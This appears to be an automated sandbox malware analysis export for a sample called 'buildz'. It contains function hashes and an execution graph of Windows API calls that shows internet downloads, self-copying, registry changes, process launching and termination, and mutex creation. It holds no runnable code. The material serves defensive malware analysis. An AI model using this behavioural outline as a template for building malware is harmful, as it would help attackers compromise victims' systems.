                          • API String ID: 3016257755-0
                          • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                          • Instruction ID: d8b20941608344fbcd590f5dfc039d10d7f71785d4f9b1ee60ca7db808991a89
                          • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                          • Instruction Fuzzy Hash: FA01363640015ABBCF225E84DC11EEE3F66BB19358B498415FE9D58920D336C5B2AB81
                          APIs
                          • ___BuildCatchObject.LIBCMT ref: 023D7A4B
                            • Part of subcall function 023D8140: ___BuildCatchObjectHelper.LIBCMT ref: 023D8172
                            • Part of subcall function 023D8140: ___AdjustPointer.LIBCMT ref: 023D8189
                          • _UnwindNestedFrames.LIBCMT ref: 023D7A62
                          • ___FrameUnwindToState.LIBCMT ref: 023D7A74
                          • CallCatchBlock.LIBCMT ref: 023D7A98
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                          • String ID:
                          • API String ID: 2901542994-0
                          • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                          • Instruction ID: 49b962e361d24a539bd3fdf2fe22588f709efec9ae27e2987ca394a8eaa87550
                          • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                          • Instruction Fuzzy Hash: 6101D732100109BBCF22AF55ED01EEA7BBAFF48754F158015F91866221D732E961DFA0
                          APIs
                          • __getptd.LIBCMT ref: 00407212
                            • Part of subcall function 00405A74: __getptd_noexit.LIBCMT ref: 00405A77
                            • Part of subcall function 00405A74: __amsg_exit.LIBCMT ref: 00405A84
                          • __getptd.LIBCMT ref: 00407229
                          • __amsg_exit.LIBCMT ref: 00407237
                          • __lock.LIBCMT ref: 00407247
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097151386.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2097082680.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097348844.000000000049E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097366037.00000000004A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097398498.0000000000531000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_buildz.jbxd
                          Similarity
                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                          • String ID:
                          • API String ID: 3521780317-0
                          • Opcode ID: baa2766414b9cb830d9fe5677b1d0fea20aa03585ea51caa9be4594188b85492
                          • Instruction ID: 3f06ffd8db038f26a5a4ccc88947a2d9be6fb04c290c6d388286fae98e0f4496
                          • Opcode Fuzzy Hash: baa2766414b9cb830d9fe5677b1d0fea20aa03585ea51caa9be4594188b85492
                          • Instruction Fuzzy Hash: E2F04F31E446048ADA20BB769806B4976A06B05728F1042BFF150BB2D1CA7CA901CA5F

                          Execution Graph

                          Execution Coverage:2%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:35.4%
                          Total number of Nodes:806
                          Total number of Limit Nodes:91
                          execution_graph 43980 423f84 43981 423f90 __wsopen_helper 43980->43981 44017 432603 GetStartupInfoW 43981->44017 43984 423f95 44019 4278d5 GetProcessHeap 43984->44019 43985 423fed 43986 423ff8 43985->43986 44349 42411a 58 API calls 3 library calls 43985->44349 44020 425141 43986->44020 43989 423ffe 43990 424009 __RTC_Initialize 43989->43990 44350 42411a 58 API calls 3 library calls 43989->44350 44041 428754 43990->44041 43993 424018 43994 424024 GetCommandLineW 43993->43994 44351 42411a 58 API calls 3 library calls 43993->44351 44060 43235f GetEnvironmentStringsW 43994->44060 43997 424023 43997->43994 44000 42403e 44001 424049 44000->44001 44352 427c2e 58 API calls 3 library calls 44000->44352 44070 4321a1 44001->44070 44005 42405a 44084 427c68 44005->44084 44008 424062 44009 42406d __wwincmdln 44008->44009 44354 427c2e 58 API calls 3 library calls 44008->44354 44090 419f90 44009->44090 44012 424081 44013 424090 44012->44013 44346 427f3d 44012->44346 44355 427c59 58 API calls _doexit 44013->44355 44016 424095 __wsopen_helper 44018 432619 44017->44018 44018->43984 44019->43985 44356 427d6c 36 API calls 2 library calls 44020->44356 44022 425146 44357 428c48 InitializeCriticalSectionAndSpinCount ___lock_fhandle 44022->44357 44024 42514b 44025 42514f 44024->44025 44359 4324f7 TlsAlloc 44024->44359 44358 4251b7 61 API calls 2 library calls 44025->44358 44028 425154 44028->43989 44029 425161 44029->44025 44030 42516c 44029->44030 44360 428c96 44030->44360 44033 4251ae 44368 4251b7 61 API calls 2 library calls 44033->44368 44036 42518d 44036->44033 44038 425193 44036->44038 44037 4251b3 44037->43989 44367 42508e 58 API calls 4 library calls 44038->44367 44040 42519b GetCurrentThreadId 44040->43989 44042 428760 __wsopen_helper 44041->44042 44380 428af7 44042->44380 44044 428767 44045 428c96 __calloc_crt 58 API calls 44044->44045 44046 428778 44045->44046 44047 4287e3 GetStartupInfoW 44046->44047 44049 428783 __wsopen_helper @_EH4_CallFilterFunc@8 44046->44049 44048 428927 44047->44048 44055 4287f8 44047->44055 44050 4289ef 44048->44050 44053 428974 GetStdHandle 44048->44053 44054 428987 GetFileType 44048->44054 44388 43263e InitializeCriticalSectionAndSpinCount 44048->44388 44049->43993 44389 4289ff LeaveCriticalSection _doexit 44050->44389 44052 428c96 __calloc_crt 58 API calls 44052->44055 44053->44048 44054->44048 44055->44048 44055->44052 44057 428846 44055->44057 44056 42887a GetFileType 44056->44057 44057->44048 44057->44056 44387 43263e InitializeCriticalSectionAndSpinCount 44057->44387 44061 432370 44060->44061 44062 424034 44060->44062 44392 428cde 58 API calls 2 library calls 44061->44392 44066 431f64 GetModuleFileNameW 44062->44066 44064 4323ac FreeEnvironmentStringsW 44064->44062 44065 432396 ___check_float_string 44065->44064 44067 431f98 _wparse_cmdline 44066->44067 44069 431fd8 _wparse_cmdline 44067->44069 44393 428cde 58 API calls 2 library calls 44067->44393 44069->44000 44071 42404f 44070->44071 44072 4321ba _GetLcidFromCountry 44070->44072 44071->44005 44353 427c2e 58 API calls 3 library calls 44071->44353 44073 428c96 __calloc_crt 58 API calls 44072->44073 44080 4321e3 _GetLcidFromCountry 44073->44080 44074 43223a 44395 420bed 58 API calls 2 library calls 44074->44395 44076 428c96 __calloc_crt 58 API calls 44076->44080 44077 43225f 44396 420bed 58 API calls 2 library calls 44077->44396 44080->44071 44080->44074 44080->44076 44080->44077 44081 432276 44080->44081 44394 42962f 58 API calls __wsopen_helper 44080->44394 44397 4242fd 8 API calls 2 library calls 44081->44397 44083 432282 44086 427c74 __IsNonwritableInCurrentImage 44084->44086 44398 43aeb5 44086->44398 44087 427c92 __initterm_e 44089 427cb1 _doexit __IsNonwritableInCurrentImage 44087->44089 44401 4219ac 67 API calls __cinit 44087->44401 44089->44008 44091 419fa0 __write_nolock 44090->44091 44402 40cf10 44091->44402 44093 419fb0 44094 419fc4 GetCurrentProcess GetLastError SetPriorityClass 44093->44094 44095 419fb4 44093->44095 44097 419fe4 GetLastError 44094->44097 44098 419fe6 44094->44098 44626 4124e0 109 API calls _memset 44095->44626 44097->44098 44416 41d3c0 44098->44416 44099 419fb9 44099->44012 44102 41a022 44419 41d340 44102->44419 44103 41b669 44725 44f23e 59 API calls 2 library calls 44103->44725 44105 41b673 44726 44f23e 59 API calls 2 library calls 44105->44726 44110 41a065 44424 413a90 44110->44424 44114 41a159 GetCommandLineW CommandLineToArgvW lstrcpyW 44116 41a33d GlobalFree 44114->44116 44130 41a196 44114->44130 44115 41a100 44115->44114 44117 41a354 44116->44117 44118 41a45c 44116->44118 44119 412220 76 API calls 44117->44119 44480 412220 44118->44480 44121 41a359 44119->44121 44123 41a466 44121->44123 44495 40ef50 44121->44495 44122 41a1cc lstrcmpW lstrcmpW 44122->44130 44123->44012 44125 41a24a lstrcpyW lstrcpyW lstrcmpW lstrcmpW 44125->44130 44126 420235 60 API calls _TranslateName 44126->44130 44127 41a48f 44129 41a4ef 44127->44129 44500 413ea0 44127->44500 44131 411cd0 92 API calls 44129->44131 44130->44116 44130->44122 44130->44125 44130->44126 44132 41a361 44130->44132 44133 41a563 44131->44133 44440 423c92 44132->44440 44167 41a5db 44133->44167 44521 414690 44133->44521 44136 41a395 OpenProcess 44137 41a402 44136->44137 44138 41a3a9 WaitForSingleObject CloseHandle 44136->44138 44443 411cd0 44137->44443 44138->44137 44141 41a3cb 44138->44141 44139 41a6f9 44628 411a10 8 API calls 44139->44628 44157 41a3e2 GlobalFree 44141->44157 44158 41a3d4 Sleep 44141->44158 44627 411ab0 PeekMessageW DispatchMessageW PeekMessageW 44141->44627 44142 41a6fe 44146 41a8b6 CreateMutexA 44142->44146 44147 41a70f 44142->44147 44143 41a5a9 44149 414690 59 API calls 44143->44149 44152 41a8ca 44146->44152 44151 41a7dc 44147->44151 44162 40ef50 58 API calls 44147->44162 44154 41a5d4 44149->44154 44150 41a40b GetCurrentProcess GetExitCodeProcess TerminateProcess CloseHandle 44155 41a451 44150->44155 44159 40ef50 58 API calls 44151->44159 44156 40ef50 58 API calls 44152->44156 44153 41a624 GetVersion 44153->44139 44160 41a632 lstrcpyW lstrcatW lstrcatW 44153->44160 44544 40d240 CoInitialize 44154->44544 44155->44012 44170 41a8da 44156->44170 44163 41a3f7 44157->44163 44158->44136 44164 41a7ec 44159->44164 44165 41a674 _memset 44160->44165 44172 41a72f 44162->44172 44163->44012 44166 41a7f1 lstrlenA 44164->44166 44169 41a6b4 ShellExecuteExW 44165->44169 44630 420c62 44166->44630 44167->44139 44167->44142 44167->44146 44167->44153 44169->44142 44191 41a6e3 44169->44191 44173 413ea0 59 API calls 44170->44173 44185 41a92f 44170->44185 44171 41a810 _memset 44175 41a81e MultiByteToWideChar lstrcatW 44171->44175 44174 413ea0 59 API calls 44172->44174 44177 41a780 44172->44177 44173->44170 44174->44172 44175->44166 44176 41a847 lstrlenW 44175->44176 44178 41a8a0 CreateMutexA 44176->44178 44179 41a856 44176->44179 44180 41a792 44177->44180 44181 41a79c CreateThread 44177->44181 44178->44152 44648 40e760 95 API calls 44179->44648 44629 413ff0 59 API calls ___check_float_string 44180->44629 44181->44151 44186 41a7d0 44181->44186 45030 41dbd0 95 API calls 4 library calls 44181->45030 44184 41a860 CreateThread WaitForSingleObject 44184->44178 45031 41e690 203 API calls 8 library calls 44184->45031 44649 415c10 44185->44649 44186->44151 44188 41a98c 44664 412840 60 API calls 44188->44664 44190 41a997 44665 410fc0 93 API calls 4 library calls 44190->44665 44191->44012 44193 41a9ab 44194 41a9c2 lstrlenA 44193->44194 44194->44191 44195 41a9d8 44194->44195 44196 415c10 59 API calls 44195->44196 44197 41aa23 44196->44197 44666 412840 60 API calls 44197->44666 44199 41aa2e lstrcpyA 44201 41aa4b 44199->44201 44202 415c10 59 API calls 44201->44202 44203 41aa90 44202->44203 44204 40ef50 58 API calls 44203->44204 44205 41aaa0 44204->44205 44206 413ea0 59 API calls 44205->44206 44207 41aaf5 44205->44207 44206->44205 44667 413ff0 59 API calls ___check_float_string 44207->44667 44209 41ab1d 44668 412900 44209->44668 44211 40ef50 58 API calls 44213 41abc5 44211->44213 44212 41ab28 _memmove 44212->44211 44214 413ea0 59 API calls 44213->44214 44215 41ac1e 44213->44215 44214->44213 44673 413ff0 59 API calls ___check_float_string 44215->44673 44217 41ac46 44218 412900 60 API calls 44217->44218 44220 41ac51 _memmove 44218->44220 44219 40ef50 58 API calls 44221 41acee 44219->44221 44220->44219 44222 413ea0 59 API calls 44221->44222 44223 41ad43 44221->44223 44222->44221 44674 413ff0 59 API calls ___check_float_string 44223->44674 44225 41ad6b 44226 412900 60 API calls 44225->44226 44229 41ad76 _memmove 44226->44229 44227 415c10 59 API calls 44228 41ae2a 44227->44228 44675 413580 59 API calls 44228->44675 44229->44227 44231 41ae3c 44232 415c10 59 API calls 44231->44232 44233 41ae76 44232->44233 44676 413580 59 API calls 44233->44676 44235 41ae82 44236 415c10 59 API calls 44235->44236 44237 41aebc 44236->44237 44677 413580 59 API calls 44237->44677 44239 41aec8 44240 415c10 59 API calls 44239->44240 44241 41af02 44240->44241 44678 413580 59 API calls 44241->44678 44243 41af0e 44244 415c10 59 API calls 44243->44244 44245 41af48 44244->44245 44679 413580 59 API calls 44245->44679 44247 41af54 44248 415c10 59 API calls 44247->44248 44249 41af8e 44248->44249 44680 413580 59 API calls 44249->44680 44251 41af9a 44252 415c10 59 API calls 44251->44252 44253 41afd4 44252->44253 44681 413580 59 API calls 44253->44681 44255 41afe0 44682 413100 59 API calls 44255->44682 44257 41b001 44683 413580 59 API calls 44257->44683 44259 41b025 44684 413100 59 API calls 44259->44684 44261 41b03c 44685 413580 59 API calls 44261->44685 44263 41b059 44686 413100 59 API calls 44263->44686 44265 41b070 44687 413580 59 API calls 44265->44687 44267 41b07c 44688 413100 59 API calls 44267->44688 44269 41b093 44689 413580 59 API calls 44269->44689 44271 41b09f 44690 413100 59 API calls 44271->44690 44273 41b0b6 44691 413580 59 API calls 44273->44691 44275 41b0c2 44692 413100 59 API calls 44275->44692 44277 41b0d9 44693 413580 59 API calls 44277->44693 44279 41b0e5 44694 413100 59 API calls 44279->44694 44281 41b0fc 44695 413580 59 API calls 44281->44695 44283 41b108 44285 41b130 44283->44285 44696 41cdd0 59 API calls 44283->44696 44286 40ef50 58 API calls 44285->44286 44287 41b16e 44286->44287 44289 41b1a5 GetUserNameW 44287->44289 44697 412de0 59 API calls 44287->44697 44290 41b1c9 44289->44290 44698 412c40 44290->44698 44292 41b1d8 44705 412bf0 59 API calls 44292->44705 44294 41b1ea 44706 40ecb0 60 API calls 2 library calls 44294->44706 44296 41b2f5 44709 4136c0 59 API calls 44296->44709 44298 41b308 44710 40ca70 59 API calls 44298->44710 44300 41b311 44711 4130b0 59 API calls 44300->44711 44302 412c40 59 API calls 44317 41b1f3 44302->44317 44303 41b322 44712 40c740 120 API calls 4 library calls 44303->44712 44305 412900 60 API calls 44305->44317 44306 41b327 44713 4111c0 169 API calls 2 library calls 44306->44713 44309 41b33b 44714 41ba10 LoadCursorW RegisterClassExW 44309->44714 44311 41b343 44715 41ba80 CreateWindowExW ShowWindow UpdateWindow 44311->44715 44313 413100 59 API calls 44313->44317 44314 41b34b 44318 41b34f 44314->44318 44716 410a50 65 API calls 44314->44716 44317->44296 44317->44302 44317->44305 44317->44313 44707 413580 59 API calls 44317->44707 44708 40f1f0 59 API calls 44317->44708 44318->44191 44319 41b379 44717 413100 59 API calls 44319->44717 44321 41b3a5 44718 413580 59 API calls 44321->44718 44323 41b48b 44724 41fdc0 CreateThread 44323->44724 44325 41b49f GetMessageW 44326 41b4ed 44325->44326 44327 41b4bf 44325->44327 44328 41b502 PostThreadMessageW 44326->44328 44329 41b55b 44326->44329 44330 41b4c5 TranslateMessage DispatchMessageW GetMessageW 44327->44330 44332 41b510 PeekMessageW 44328->44332 44333 41b564 PostThreadMessageW 44329->44333 44334 41b5bb 44329->44334 44330->44326 44330->44330 44335 41b546 WaitForSingleObject 44332->44335 44336 41b526 DispatchMessageW PeekMessageW 44332->44336 44337 41b570 PeekMessageW 44333->44337 44334->44318 44340 41b5d2 CloseHandle 44334->44340 44335->44329 44335->44332 44336->44335 44336->44336 44338 41b5a6 WaitForSingleObject 44337->44338 44339 41b586 DispatchMessageW PeekMessageW 44337->44339 44338->44334 44338->44337 44339->44338 44339->44339 44340->44318 44345 41b3b3 44345->44323 44719 41c330 59 API calls 44345->44719 44720 41c240 59 API calls 44345->44720 44721 41b8b0 59 API calls 44345->44721 44722 413260 59 API calls 44345->44722 44723 41fa10 CreateThread 44345->44723 45032 427e0e 44346->45032 44348 427f4c 44348->44013 44349->43986 44350->43990 44351->43997 44355->44016 44356->44022 44357->44024 44358->44028 44359->44029 44361 428c9d 44360->44361 44363 425179 44361->44363 44365 428cbb 44361->44365 44369 43b813 44361->44369 44363->44033 44366 432553 TlsSetValue 44363->44366 44365->44361 44365->44363 44377 4329c9 Sleep 44365->44377 44366->44036 44367->44040 44368->44037 44370 43b81e 44369->44370 44373 43b839 44369->44373 44371 43b82a 44370->44371 44370->44373 44378 425208 58 API calls __getptd_noexit 44371->44378 44372 43b849 HeapAlloc 44372->44373 44375 43b82f 44372->44375 44373->44372 44373->44375 44379 42793d DecodePointer 44373->44379 44375->44361 44377->44365 44378->44375 44379->44373 44381 428b1b EnterCriticalSection 44380->44381 44382 428b08 44380->44382 44381->44044 44390 428b9f 58 API calls 9 library calls 44382->44390 44384 428b0e 44384->44381 44391 427c2e 58 API calls 3 library calls 44384->44391 44387->44057 44388->44048 44389->44049 44390->44384 44392->44065 44393->44069 44394->44080 44395->44071 44396->44071 44397->44083 44399 43aeb8 EncodePointer 44398->44399 44399->44399 44400 43aed2 44399->44400 44400->44087 44401->44089 44403 40cf32 _memset __write_nolock 44402->44403 44404 40cf4f InternetOpenW 44403->44404 44405 415c10 59 API calls 44404->44405 44406 40cf8a InternetOpenUrlW 44405->44406 44407 40cfb9 InternetReadFile InternetCloseHandle InternetCloseHandle 44406->44407 44415 40cfb2 44406->44415 44727 4156d0 44407->44727 44409 40d000 44410 4156d0 59 API calls 44409->44410 44411 40d049 44410->44411 44411->44415 44746 413010 59 API calls 44411->44746 44413 40d084 44413->44415 44747 413010 59 API calls 44413->44747 44415->44093 44752 41ccc0 44416->44752 44772 41cc50 44419->44772 44422 41a04d 44422->44105 44422->44110 44425 413ab2 44424->44425 44432 413ad0 GetModuleFileNameW PathRemoveFileSpecW 44424->44432 44426 413b00 44425->44426 44427 413aba 44425->44427 44780 44f23e 59 API calls 2 library calls 44426->44780 44429 423b4c 59 API calls 44427->44429 44430 413ac7 44429->44430 44430->44432 44781 44f1bb 59 API calls 3 library calls 44430->44781 44434 418400 44432->44434 44435 418437 44434->44435 44439 418446 44434->44439 44435->44439 44782 415d50 59 API calls ___check_float_string 44435->44782 44437 4184b9 44437->44115 44439->44437 44783 418d50 59 API calls 44439->44783 44784 431781 44440->44784 44802 42f7c0 44443->44802 44446 411d20 _memset 44447 411d40 RegQueryValueExW RegCloseKey 44446->44447 44448 411d8f 44447->44448 44449 415c10 59 API calls 44448->44449 44450 411dbf 44449->44450 44451 411dd1 lstrlenA 44450->44451 44452 411e7c 44450->44452 44804 413520 59 API calls 44451->44804 44454 411e94 6 API calls 44452->44454 44456 411ef5 UuidCreate UuidToStringW 44454->44456 44455 411df1 44457 411e3c PathFileExistsW 44455->44457 44458 411e00 44455->44458 44459 411f36 44456->44459 44457->44452 44460 411e52 44457->44460 44458->44455 44458->44457 44462 415c10 59 API calls 44459->44462 44461 411e6a 44460->44461 44464 414690 59 API calls 44460->44464 44470 4121d1 44461->44470 44463 411f59 RpcStringFreeW PathAppendW CreateDirectoryW 44462->44463 44466 411fce 44463->44466 44468 411f98 44463->44468 44464->44461 44465 415c10 59 API calls 44465->44466 44467 415c10 59 API calls 44466->44467 44469 41201f PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 44467->44469 44468->44465 44469->44470 44471 41207c _memset 44469->44471 44470->44150 44472 412095 6 API calls 44471->44472 44473 412115 _memset 44472->44473 44474 412109 44472->44474 44476 412125 SetLastError lstrcpyW lstrcatW lstrcatW CreateProcessW 44473->44476 44805 413260 59 API calls 44474->44805 44477 4121b2 44476->44477 44478 4121aa GetLastError 44476->44478 44479 4121c0 WaitForSingleObject 44477->44479 44478->44470 44479->44470 44479->44479 44481 42f7c0 __write_nolock 44480->44481 44482 41222d 7 API calls 44481->44482 44483 4122bd K32EnumProcesses 44482->44483 44484 41228c LoadLibraryW GetProcAddress GetProcAddress GetProcAddress 44482->44484 44485 4122d3 44483->44485 44486 4122df 44483->44486 44484->44483 44485->44121 44487 412353 44486->44487 44488 4122f0 OpenProcess 44486->44488 44487->44121 44489 412346 CloseHandle 44488->44489 44490 41230a K32EnumProcessModules 44488->44490 44489->44487 44489->44488 44490->44489 44491 41231c K32GetModuleBaseNameW 44490->44491 44806 420235 44491->44806 44493 41233e 44493->44489 44494 412345 44493->44494 44494->44489 44496 420c62 _malloc 58 API calls 44495->44496 44499 40ef6e _memset 44496->44499 44497 40efdc 44497->44127 44498 420c62 _malloc 58 API calls 44498->44499 44499->44497 44499->44498 44499->44499 44501 413f05 44500->44501 44507 413eae 44500->44507 44502 413fb1 44501->44502 44503 413f18 44501->44503 44822 44f23e 59 API calls 2 library calls 44502->44822 44505 413fbb 44503->44505 44506 413f2d 44503->44506 44513 413f3d ___check_float_string 44503->44513 44823 44f23e 59 API calls 2 library calls 44505->44823 44506->44513 44821 416760 59 API calls 2 library calls 44506->44821 44507->44501 44511 413ed4 44507->44511 44514 413ed9 44511->44514 44515 413eef 44511->44515 44513->44127 44819 413da0 59 API calls ___check_float_string 44514->44819 44820 413da0 59 API calls ___check_float_string 44515->44820 44519 413ee9 44519->44127 44520 413eff 44520->44127 44522 4146a9 44521->44522 44523 41478c 44521->44523 44525 4146b6 44522->44525 44526 4146e9 44522->44526 44826 44f26c 59 API calls 3 library calls 44523->44826 44527 414796 44525->44527 44528 4146c2 44525->44528 44529 4147a0 44526->44529 44530 4146f5 44526->44530 44827 44f26c 59 API calls 3 library calls 44527->44827 44824 413340 59 API calls _memmove 44528->44824 44828 44f23e 59 API calls 2 library calls 44529->44828 44540 414707 ___check_float_string 44530->44540 44825 416950 59 API calls 2 library calls 44530->44825 44539 4146e0 44539->44143 44540->44143 44545 40d276 44544->44545 44546 40d27d CoInitializeSecurity 44544->44546 44545->44167 44547 414690 59 API calls 44546->44547 44548 40d2b8 CoCreateInstance 44547->44548 44549 40d2e3 VariantInit VariantInit VariantInit VariantInit 44548->44549 44550 40da3c CoUninitialize 44548->44550 44551 40d38e VariantClear VariantClear VariantClear VariantClear 44549->44551 44550->44545 44552 40d3e2 44551->44552 44553 40d3cc CoUninitialize 44551->44553 44829 40b140 44552->44829 44553->44545 44556 40d3f6 44834 40b1d0 44556->44834 44558 40d422 44559 40d426 CoUninitialize 44558->44559 44560 40d43c 44558->44560 44559->44545 44561 40b140 60 API calls 44560->44561 44563 40d449 44561->44563 44564 40b1d0 SysFreeString 44563->44564 44565 40d471 44564->44565 44566 40d496 CoUninitialize 44565->44566 44567 40d4ac 44565->44567 44566->44545 44569 40d8cf 44567->44569 44570 40b140 60 API calls 44567->44570 44569->44550 44571 40d4d5 44570->44571 44572 40b1d0 SysFreeString 44571->44572 44573 40d4fd 44572->44573 44573->44569 44574 40b140 60 API calls 44573->44574 44575 40d5ae 44574->44575 44576 40b1d0 SysFreeString 44575->44576 44577 40d5d6 44576->44577 44577->44569 44578 40b140 60 API calls 44577->44578 44579 40d679 44578->44579 44580 40b1d0 SysFreeString 44579->44580 44581 40d6a1 44580->44581 44581->44569 44582 40b140 60 API calls 44581->44582 44583 40d6b6 44582->44583 44584 40b1d0 SysFreeString 44583->44584 44585 40d6de 44584->44585 44585->44569 44586 40b140 60 API calls 44585->44586 44587 40d707 44586->44587 44588 40b1d0 SysFreeString 44587->44588 44589 40d72f 44588->44589 44589->44569 44590 40b140 60 API calls 44589->44590 44591 40d744 44590->44591 44592 40b1d0 SysFreeString 44591->44592 44593 40d76c 44592->44593 44593->44569 44838 423aaf GetSystemTimeAsFileTime 44593->44838 44595 40d77d 44840 423551 44595->44840 44600 412c40 59 API calls 44601 40d7b5 44600->44601 44602 412900 60 API calls 44601->44602 44603 40d7c3 44602->44603 44604 40b140 60 API calls 44603->44604 44605 40d7db 44604->44605 44606 40b1d0 SysFreeString 44605->44606 44607 40d7ff 44606->44607 44607->44569 44608 40b140 60 API calls 44607->44608 44609 40d8a3 44608->44609 44610 40b1d0 SysFreeString 44609->44610 44611 40d8cb 44610->44611 44611->44569 44612 40b140 60 API calls 44611->44612 44613 40d8ea 44612->44613 44614 40b1d0 SysFreeString 44613->44614 44615 40d912 44614->44615 44615->44569 44848 40b400 SysAllocString 44615->44848 44617 40d936 VariantInit VariantInit 44618 40b140 60 API calls 44617->44618 44619 40d985 44618->44619 44620 40b1d0 SysFreeString 44619->44620 44621 40d9e7 VariantClear VariantClear VariantClear 44620->44621 44622 40da10 44621->44622 44623 40da46 CoUninitialize 44621->44623 44852 42052a 78 API calls vswprintf 44622->44852 44623->44545 44626->44099 44627->44141 44628->44142 44629->44181 44631 420cdd 44630->44631 44633 420c6e 44630->44633 45020 42793d DecodePointer 44631->45020 44641 420c79 44633->44641 44634 420ce3 45021 425208 58 API calls __getptd_noexit 44634->45021 44637 420ca1 HeapAlloc 44640 420cd5 44637->44640 44637->44641 44638 420ce9 44638->44171 44640->44638 44641->44633 44641->44637 44642 420cc9 44641->44642 44646 420cc7 44641->44646 45012 427f51 58 API calls 2 library calls 44641->45012 45013 427fae 58 API calls 9 library calls 44641->45013 45014 427b0b 44641->45014 45017 42793d DecodePointer 44641->45017 45018 425208 58 API calls __getptd_noexit 44642->45018 45019 425208 58 API calls __getptd_noexit 44646->45019 44648->44184 44650 415c66 44649->44650 44651 415c1e 44649->44651 44652 415c76 44650->44652 44653 415cff 44650->44653 44651->44650 44661 415c45 44651->44661 44659 415c88 ___check_float_string 44652->44659 45026 416950 59 API calls 2 library calls 44652->45026 45027 44f23e 59 API calls 2 library calls 44653->45027 44659->44188 44662 414690 59 API calls 44661->44662 44663 415c60 44662->44663 44663->44188 44664->44190 44665->44193 44666->44199 44667->44209 44669 413a90 59 API calls 44668->44669 44670 41294c MultiByteToWideChar 44669->44670 44671 418400 59 API calls 44670->44671 44672 41298d 44671->44672 44672->44212 44673->44217 44674->44225 44675->44231 44676->44235 44677->44239 44678->44243 44679->44247 44680->44251 44681->44255 44682->44257 44683->44259 44684->44261 44685->44263 44686->44265 44687->44267 44688->44269 44689->44271 44690->44273 44691->44275 44692->44277 44693->44279 44694->44281 44695->44283 44696->44285 44697->44287 44699 412c71 44698->44699 44700 412c5f 44698->44700 44703 4156d0 59 API calls 44699->44703 44701 4156d0 59 API calls 44700->44701 44702 412c6a 44701->44702 44702->44292 44704 412c8a 44703->44704 44704->44292 44705->44294 44706->44317 44707->44317 44708->44317 44709->44298 44710->44300 44711->44303 44712->44306 44713->44309 44714->44311 44715->44314 44716->44319 44717->44321 44718->44345 44719->44345 44720->44345 44721->44345 44722->44345 44723->44345 45028 41f130 218 API calls _TranslateName 44723->45028 44724->44325 45029 41fd80 64 API calls 44724->45029 44728 415735 44727->44728 44729 4156de 44727->44729 44730 4157bc 44728->44730 44731 41573e 44728->44731 44729->44728 44738 415704 44729->44738 44751 44f23e 59 API calls 2 library calls 44730->44751 44734 415750 ___check_float_string 44731->44734 44750 416760 59 API calls 2 library calls 44731->44750 44734->44409 44740 415709 44738->44740 44741 41571f 44738->44741 44748 413ff0 59 API calls ___check_float_string 44740->44748 44749 413ff0 59 API calls ___check_float_string 44741->44749 44744 415719 44744->44409 44745 41572f 44745->44409 44746->44413 44747->44415 44748->44744 44749->44745 44750->44734 44758 423b4c 44752->44758 44754 41ccca 44757 41a00a 44754->44757 44768 44f1bb 59 API calls 3 library calls 44754->44768 44757->44102 44757->44103 44760 423b54 44758->44760 44759 420c62 _malloc 58 API calls 44759->44760 44760->44759 44761 423b6e 44760->44761 44763 423b72 std::exception::exception 44760->44763 44769 42793d DecodePointer 44760->44769 44761->44754 44770 430eca RaiseException 44763->44770 44765 423b9c 44771 430d91 58 API calls _free 44765->44771 44767 423bae 44767->44754 44769->44760 44770->44765 44771->44767 44773 423b4c 59 API calls 44772->44773 44774 41cc5d 44773->44774 44775 41cc64 44774->44775 44779 44f1bb 59 API calls 3 library calls 44774->44779 44775->44422 44778 41d740 59 API calls 44775->44778 44778->44422 44782->44439 44783->44439 44787 431570 44784->44787 44788 431580 44787->44788 44789 431586 44788->44789 44794 4315ae 44788->44794 44798 425208 58 API calls __getptd_noexit 44789->44798 44791 43158b 44799 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44791->44799 44797 4315cf wcstoxq 44794->44797 44800 42e883 GetStringTypeW 44794->44800 44795 41a36e lstrcpyW lstrcpyW 44795->44136 44797->44795 44801 425208 58 API calls __getptd_noexit 44797->44801 44798->44791 44799->44795 44800->44794 44801->44795 44803 411cf2 RegOpenKeyExW 44802->44803 44803->44446 44803->44470 44804->44455 44805->44473 44807 420241 44806->44807 44808 4202b6 44806->44808 44815 420266 44807->44815 44816 425208 58 API calls __getptd_noexit 44807->44816 44818 4202c8 60 API calls 3 library calls 44808->44818 44811 4202c3 44811->44493 44812 42024d 44817 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44812->44817 44814 420258 44814->44493 44815->44493 44816->44812 44817->44814 44818->44811 44819->44519 44820->44520 44821->44513 44824->44539 44825->44540 44826->44527 44827->44529 44830 423b4c 59 API calls 44829->44830 44831 40b164 44830->44831 44832 40b177 SysAllocString 44831->44832 44833 40b194 44831->44833 44832->44833 44833->44556 44835 40b1de 44834->44835 44837 40b202 44834->44837 44836 40b1f5 SysFreeString 44835->44836 44835->44837 44836->44837 44837->44558 44839 423add __aulldiv 44838->44839 44839->44595 44853 43035d 44840->44853 44842 42355a 44844 40d78f 44842->44844 44861 423576 44842->44861 44845 4228e0 44844->44845 44965 42279f 44845->44965 44849 40b423 44848->44849 44850 40b41d 44848->44850 44851 40b42d VariantClear 44849->44851 44850->44617 44851->44617 44852->44569 44894 42501f 58 API calls 4 library calls 